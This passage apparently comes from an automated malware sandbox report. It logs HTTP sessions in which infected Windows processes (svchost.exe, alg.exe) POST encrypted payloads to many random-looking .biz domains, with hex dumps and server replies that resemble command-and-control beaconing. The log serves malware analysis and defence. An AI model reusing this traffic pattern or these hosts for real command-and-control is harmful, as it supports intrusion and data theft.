                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=c1436184f12f519c68235764ee3526c4|8.46.123.33|1728394161|1728394161|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                              101192.168.2.45013285.214.228.14080
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.218652010 CEST358OUTPOST /lcarfqhjjqwitg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.218652010 CEST778OUTData Raw: 0f 27 55 97 e0 86 00 82 fe 02 00 00 b3 8e 0a 64 b8 65 06 95 a5 71 d5 b1 35 6c c1 dc da 10 bc 5e c4 8d 38 6f ee 5d 7d e6 d6 25 66 7a 12 72 6c 17 ad bc 22 6e db 65 d1 2e 21 b4 9b 6a 76 86 d7 3e 07 75 5a 2b c2 83 df 11 49 f9 3d f8 34 58 2f d3 73 05
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 'Udeq5l^8o]}%fzrl"ne.!jv>uZ+I=4X/s##f,^%4bHQ4\ :m.q]fz fMlplzxRwmCS'_Qb(e14^v,`b~}~t}97`V SN
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.848566055 CEST166INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.27.2
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Keep-Alive: timeout=20
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              102192.168.2.45013713.251.16.150804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.857755899 CEST350OUTPOST /gvodnknqs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.857755899 CEST786OUTData Raw: 7f 7e 30 fa 2c 51 64 93 06 03 00 00 ac b0 41 ec 8e 84 8b ee 3d 2e c7 3f 99 23 6c ef a2 36 d1 d5 98 74 98 6a 77 22 ff 2c 60 97 69 9c ba 1c 3b e0 06 18 14 30 8e 1c 48 df 8f 2f 94 b1 d4 81 35 96 9e cd 4d 8c 42 bc b2 b2 9f 57 97 7a f8 37 e0 b0 1c 53
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ~0,QdA=.?#l6tjw",`i;0H/5MBWz7Sx0tI>+fUJ`n;#,>^ThMK5,1SS3!3,>##7\jXuoJee2g5dsN.H0%Y+k+%ey1O}D
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.227308989 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=92d14cd408b77ae3fc077b8ac30783b3|8.46.123.33|1728394162|1728394162|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              103192.168.2.45013947.129.31.212802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:22.050046921 CEST351OUTPOST /vvlfkuqn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:22.050070047 CEST778OUTData Raw: 1b b9 db 33 e3 da 55 6f fe 02 00 00 61 8d 87 79 1b af c6 c2 36 48 e2 e6 9f c4 f9 9f 59 47 e3 f2 41 1c 60 f2 92 f9 c7 46 e0 56 c1 c9 07 1b 4f e3 10 8f b1 8c c9 16 74 ca b8 ea 23 44 9c 9c 10 83 c5 63 b1 b4 1d 80 41 9c c0 77 2f fa 58 ac 27 ab 78 e9
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 3Uoay6HYGA`FVOt#DcAw/X'xH~F+;ANu[|r",')b{W WD+=Td'&ZzF`g.Sp4Lx?MiR\C+e#%LAa?G.wr#@TR)K
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.370683908 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=bc3ffbf1132f3aa8e54d978a1ff6cf10|8.46.123.33|1728394163|1728394163|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              104192.168.2.45014018.208.156.248804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.259179115 CEST350OUTPOST /ulhoa HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.259205103 CEST786OUTData Raw: 8b 82 aa f7 f1 d2 70 c3 06 03 00 00 be 3c be 0b c7 22 ae 29 6e d5 7f 19 fd f1 bc 0b 4e b8 71 2f 9e 7f 90 5c 5b db 5a e8 94 7f 5b 52 31 a0 7f 86 8b b6 0e 9d 55 52 f5 28 6d 87 11 04 a1 24 6d cd 46 26 e3 43 17 8e 7a f6 17 66 6e e4 ed cb 75 c5 2b 36
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: p<")nNq/\[Z[R1UR(m$mF&Czfnu+6bgGgyn/iRzNOx}%VZ'IJA*DkD[`M#rSe9V3&39I&y?.p8<=2M
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.713265896 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=5579e90d52af55dea770622bcf60d51f|8.46.123.33|1728394163|1728394163|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              105192.168.2.45014134.211.97.45802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.593101978 CEST352OUTPOST /vbfsvakjwax HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.593122005 CEST778OUTData Raw: ee a3 56 f8 50 44 60 50 fe 02 00 00 c6 2d 5c 64 ed 02 0d bb 01 f3 40 a6 eb 63 20 e3 31 0d 0c 79 e8 b0 18 d6 35 11 b1 bb 72 62 22 18 ce a9 2e c2 3c 66 15 4f a4 b8 b9 60 90 17 1e ca e0 79 f7 6d 9f 1e 66 c6 a6 dc b2 2e 8e b3 b8 75 f8 b2 4e 80 47 f1
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: VPD`P-\d@c 1y5rb".<fO`ymf.uNGnX23Mu:/bF_5bnjpm|8VRkS0^uJ n{{61$eH~rfKq5A8V)t;o'\k_"r >\ta:-l;J
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.473031044 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=c978ce649a648a373d1a94e42b827f67|8.46.123.33|1728394164|1728394164|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              106192.168.2.45014244.213.104.86804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.737740993 CEST354OUTPOST /gwahjspinmwkm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.737752914 CEST786OUTData Raw: 50 e6 17 d6 12 a4 0e 9f 06 03 00 00 10 f0 65 67 da 1f 1b e3 9f aa 8c db ab bd 71 b2 78 8b 93 df 07 67 ff e3 a5 49 3b 5a b7 a1 f5 64 82 2a c2 45 cc 47 5c 4d 36 4b 09 61 47 7e b0 04 c1 ca e7 42 ed 3d a6 af 82 9d 4f fd 96 95 a4 9c 44 87 5e 4b e7 77
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: PegqxgI;Zd*EG\M6KaG~B=OD^Kw8s"GWIOaeY4M)KHc& FQ.+0;6Yca.e&]COT S\*:],f!h9{,W#J
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.238662004 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=927d703718275eb93336ee5d44d24be7|8.46.123.33|1728394164|1728394164|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              107192.168.2.45014444.221.84.105804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.274794102 CEST354OUTPOST /wmdddjvyuy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.274823904 CEST786OUTData Raw: 51 50 1c 52 10 2a 91 2a 06 03 00 00 24 e8 5a 8d 87 25 35 73 8a 7c 33 74 7c d4 78 bf d4 58 5b f6 8d 05 e7 d1 b9 d6 9d 13 1d 48 aa 89 0d 31 e6 64 18 86 e4 e3 bc 21 c7 39 c1 06 77 27 1b 75 7d e8 38 ba f2 5a 5a 82 d8 7c 70 44 01 b9 32 e7 9a 7a 81 9b
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: QPR**$Z%5s|3t|xX[H1d!9w'u}8ZZ|pD2zz(tY'q3D4<l +l'H[.&7NSE1SpoX-#*`)g~n[I\hBwq)L3A
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.741008997 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=5e67b46d65812508c9d4e2802b9ae581|8.46.123.33|1728394164|1728394164|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              108192.168.2.45014547.129.31.212802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.784451962 CEST349OUTPOST /kjomliy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.784451962 CEST778OUTData Raw: 5e 60 d7 a8 88 23 11 b7 fe 02 00 00 b1 04 a3 b9 7c de 06 b0 c3 6f b8 d5 7f 3d a2 74 51 82 41 04 f1 3a 67 ba 26 1f ec b5 bc 0d ae 4e bf c2 c0 ba a5 db 39 b1 af c4 ed b0 65 c4 6a fd 1d 55 c2 1e 4e 5d a7 0f b0 23 7e 19 e7 bf 83 d6 df 61 87 27 62 d2
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ^`#|o=tQA:g&N9ejUN]#~a'biE:yu"4$l?!=W))(o4@(H>-m.>J6-:]/QMC%7=FhyX]v%7H<9^g;H\qyAA)P=&-+'D
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.110538960 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=89f4e3c3b080c10994f3b66d106b071c|8.46.123.33|1728394165|1728394165|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              109192.168.2.45014654.244.188.177804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.953923941 CEST357OUTPOST /gimbgsoaqvqvqhf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.953958988 CEST786OUTData Raw: 99 62 bc 41 e8 7c 95 79 06 03 00 00 d7 af 8c 5d f0 12 c6 a9 1d 5e b7 97 d0 19 13 93 11 5c 74 be 3e b9 5c fe 32 9f b8 47 37 8b aa 74 c1 fd ef b4 5c 39 92 f3 1c 20 99 2d 46 26 8b 46 6c b2 b4 05 dd b8 dc f5 a4 0c 07 83 e4 fc a8 3c 02 87 60 c4 1e 55
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: bA|y]^\t>\2G7t\9 -F&Fl<`U=1LyM]UN1[8/IcP(=V{Bw1#`H';0P@^7$QT<X2DXx_sM#1/aAED5{;`w!
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.694133997 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=6cbb374b50f34825b1daf058155f6522|8.46.123.33|1728394165|1728394165|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              110192.168.2.4501473.254.94.185804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.898819923 CEST342OUTPOST /k HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.898859978 CEST786OUTData Raw: 87 5c 40 1e d3 f7 32 3c 06 03 00 00 c4 52 56 cc 92 b5 15 5e ef a8 97 40 e0 6b 0c b9 93 ce 44 9f b5 fe 1c e4 af a7 c5 82 10 6f b7 19 74 20 18 31 f9 2a 29 6f bf 5f 61 1d 56 2f ca 3a 05 96 fc b6 0f fb 9f 4b 95 ab 01 3b 67 b1 92 d3 2b e6 5d 07 9a 8c
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: \@2<RV^@kDot 1*)o_aV/:K;g+]kc>`yPBXLv0w0(B0#mR':Zm4m^c/GiN*RCRIu.8Q8(U1|-
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.767930984 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
